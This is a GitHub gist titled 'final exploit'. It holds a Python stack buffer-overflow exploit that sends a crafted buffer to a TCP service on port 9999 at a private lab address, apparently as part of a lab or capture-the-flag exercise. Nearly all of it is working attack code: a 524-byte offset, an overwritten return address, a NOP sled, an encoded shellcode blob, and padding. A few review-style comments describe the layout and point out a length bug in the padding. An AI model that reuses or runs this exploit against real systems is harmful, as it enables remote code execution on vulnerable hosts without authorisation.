
@bensonmacharia
Forked from trevorsaudi/exploit.py
Created April 21, 2021 20:41
final exploit
import socket
from struct import pack
# Single-shot proof-of-concept sender: opens one TCP connection to IP:PORT,
# reads whatever the service sends first, and writes one crafted buffer.
# Everything below runs at import time (no main guard); the socket is never
# closed explicitly and no reply is read after the write.
# bad_chars = b"".join([pack("<B",x) for x in range(1,256)])
# ^ leftover from a byte-set test (0x01..0xFF, 0x00 excluded); unused here.
IP: str = "10.10.255.160"  # RFC 1918 private address, i.e. a lab host, hard-coded
PORT: int = 9999
# Opaque payload bytes, accumulated by repeated concatenation. What they encode
# cannot be verified from this listing; nothing below inspects or changes them.
buf: bytes = b""
buf += b"\xdb\xd4\xba\x70\xb3\xd8\x55\xd9\x74\x24\xf4\x5b\x29"
buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x23\xa0\x3a"
buf += b"\xa0\x3f\x2e\x38\x4b\xbf\xaf\x5d\xc5\x5a\x9e\x5d\xb1"
buf += b"\x2f\xb1\x6d\xb1\x7d\x3e\x05\x97\x95\xb5\x6b\x30\x9a"
buf += b"\x7e\xc1\x66\x95\x7f\x7a\x5a\xb4\x03\x81\x8f\x16\x3d"
buf += b"\x4a\xc2\x57\x7a\xb7\x2f\x05\xd3\xb3\x82\xb9\x50\x89"
buf += b"\x1e\x32\x2a\x1f\x27\xa7\xfb\x1e\x06\x76\x77\x79\x88"
buf += b"\x79\x54\xf1\x81\x61\xb9\x3c\x5b\x1a\x09\xca\x5a\xca"
buf += b"\x43\x33\xf0\x33\x6c\xc6\x08\x74\x4b\x39\x7f\x8c\xaf"
buf += b"\xc4\x78\x4b\xcd\x12\x0c\x4f\x75\xd0\xb6\xab\x87\x35"
buf += b"\x20\x38\x8b\xf2\x26\x66\x88\x05\xea\x1d\xb4\x8e\x0d"
buf += b"\xf1\x3c\xd4\x29\xd5\x65\x8e\x50\x4c\xc0\x61\x6c\x8e"
buf += b"\xab\xde\xc8\xc5\x46\x0a\x61\x84\x0e\xff\x48\x36\xcf"
buf += b"\x97\xdb\x45\xfd\x38\x70\xc1\x4d\xb0\x5e\x16\xb1\xeb"
buf += b"\x27\x88\x4c\x14\x58\x81\x8a\x40\x08\xb9\x3b\xe9\xc3"
buf += b"\x39\xc3\x3c\x43\x69\x6b\xef\x24\xd9\xcb\x5f\xcd\x33"
buf += b"\xc4\x80\xed\x3c\x0e\xa9\x84\xc7\xd9\xdc\x5a\xee\xb8"
buf += b"\x89\x58\xf0\xab\x15\xd4\x16\xa1\xb5\xb0\x81\x5e\x2f"
buf += b"\x99\x59\xfe\xb0\x37\x24\xc0\x3b\xb4\xd9\x8f\xcb\xb1"
buf += b"\xc9\x78\x3c\x8c\xb3\x2f\x43\x3a\xdb\xac\xd6\xa1\x1b"
buf += b"\xba\xca\x7d\x4c\xeb\x3d\x74\x18\x01\x67\x2e\x3e\xd8"
buf += b"\xf1\x09\xfa\x07\xc2\x94\x03\xc5\x7e\xb3\x13\x13\x7e"
buf += b"\xff\x47\xcb\x29\xa9\x31\xad\x83\x1b\xeb\x67\x7f\xf2"
buf += b"\x7b\xf1\xb3\xc5\xfd\xfe\x99\xb3\xe1\x4f\x74\x82\x1e"
buf += b"\x7f\x10\x02\x67\x9d\x80\xed\xb2\x25\xb0\xa7\x9e\x0c"
buf += b"\x59\x6e\x4b\x0d\x04\x91\xa6\x52\x31\x12\x42\x2b\xc6"
buf += b"\x0a\x27\x2e\x82\x8c\xd4\x42\x9b\x78\xda\xf1\x9c\xa8"
shellcode = buf  # alias only; same bytes object under the author's name for it
s = socket.socket()  # default family/type: AF_INET, SOCK_STREAM (plain TCP)
s.connect((IP,PORT))
s.recv(1024)  # consume up to 1 KiB the service sends first; the value is discarded
total_length: int = 2072  # intended size of the buffer assembled below
offset: int = 524  # count of 'A' filler bytes placed before the 4-byte value
nop_sled: bytes = b"\x90"*16  # sixteen 0x90 bytes (the name says NOP sled)
new_eip: bytes = pack("<I",0x311712F3)  # 32-bit little-endian value placed right after the 'A' filler
# Wire layout, in order: `offset` bytes of 'A', the 4-byte value, the 16-byte
# sled, the blob, then 'C' filler. NOTE(review): the filler expression
# subtracts len(shellcode) twice, so the buffer actually written is
# total_length - len(shellcode) bytes long, not total_length — relevant if a
# detection rule keys on the payload size.
buffer = [
b"A" * offset,
new_eip,
nop_sled,
shellcode,
b"C" * (total_length-offset-len(shellcode)-len(nop_sled)-len(shellcode))
]
buffer = b"".join(buffer)
s.send(buffer)  # single write; the byte count it returns is not checked, and nothing is read back